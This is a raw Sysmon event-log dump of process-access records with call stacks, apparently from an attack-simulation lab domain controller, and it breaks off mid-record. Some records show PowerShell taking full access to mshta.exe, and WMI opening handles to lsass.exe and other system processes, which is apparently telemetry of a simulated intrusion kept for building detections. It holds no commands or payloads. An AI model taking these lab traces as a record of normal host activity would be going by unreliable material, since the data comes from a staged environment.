14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204221Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1400-00000000AD01}1096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204220Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1300-00000000AD01}896C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204219Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204218Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204217Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1000-00000000AD01}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204216Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204215Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F13695CCB849C3F0E616F2D763A5B1E1,SHA256=D6D8583D659E4ECADA85184D229F9F54DEC38D0F90F9BE18BB2E21408E2B26EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204214Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0E00-00000000AD01}1012C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204213Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204212Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0C00-00000000AD01}852C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204211Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204210Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.962{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0900-00000000AD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204209Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.962{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=418FF6C83362F6A874A67BD4F69D1187,SHA256=521E83F173A799BEFBFF4DCCE9B0825EEB4AD22E036DDF021CBC1BC5E41BF3B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204208Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.962{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c61647e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3c23(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5458(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64) 10341000x80000000000000002204207Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.962{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3b24|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c61647e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3c23(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5458(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64) 10341000x80000000000000002204206Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204205Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.d